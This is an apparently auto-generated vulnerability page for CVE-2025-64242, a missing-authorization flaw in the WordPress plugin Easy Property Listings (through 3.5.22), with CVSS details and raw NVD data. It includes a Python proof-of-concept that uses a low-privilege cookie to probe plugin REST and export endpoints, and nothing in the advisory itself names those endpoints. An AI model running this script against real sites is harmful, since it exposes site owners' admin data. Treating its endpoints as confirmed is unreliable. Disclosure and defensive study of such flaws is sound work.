Security Vulnerability Report
中文
CVE-2025-64242 CVSS 4.3 MEDIUM

CVE-2025-64242

Published: 2025-12-16 09:15:54
Last Modified: 2026-04-27 16:16:37

Description

Missing Authorization vulnerability in Merv Barrett Easy Property Listings easy-property-listings allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Easy Property Listings: from n/a through <= 3.5.22.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Easy Property Listings <= 3.5.22

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-64242 PoC - Missing Authorization in Easy Property Listings # Target: WordPress site with Easy Property Listings plugin <= 3.5.22 def exploit_cve_2025_64242(target_url, auth_cookie): """ Exploit for Missing Authorization vulnerability This PoC demonstrates how low-privilege users can access admin functions """ # Target endpoint that lacks authorization check endpoints = [ '/wp-json/easy-property-listings/v1/listings', '/wp-json/easy-property-listings/v1/settings', '/wp-admin/admin-ajax.php?action=epl_export_listings' ] headers = { 'Cookie': auth_cookie, 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } for endpoint in endpoints: url = target_url.rstrip('/') + endpoint # Try to access sensitive endpoint as low-privilege user response = requests.get(url, headers=headers, timeout=10) # Check if unauthorized access was successful if response.status_code == 200: print(f'[+] Successfully accessed: {endpoint}') print(f' Response length: {len(response.text)} bytes') print(f' Data preview: {response.text[:200]}...') elif response.status_code == 403: print(f'[-] Access denied for: {endpoint}') else: print(f'[*] Unexpected response: {response.status_code}') if __name__ == '__main__': if len(sys.argv) < 3: print('Usage: python cve-2025-64242.py <target_url> <auth_cookie>') print('Example: python cve-2025-64242.py http://example.com wordpress_logged_in_cookie') sys.exit(1) exploit_cve_2025_64242(sys.argv[1], sys.argv[2])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64242", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:15:53.773", "lastModified": "2026-04-27T16:16:36.783", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Merv Barrett Easy Property Listings easy-property-listings allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Easy Property Listings: from n/a through <= 3.5.22."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/easy-property-listings/vulnerability/wordpress-easy-property-listings-plugin-3-5-15-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}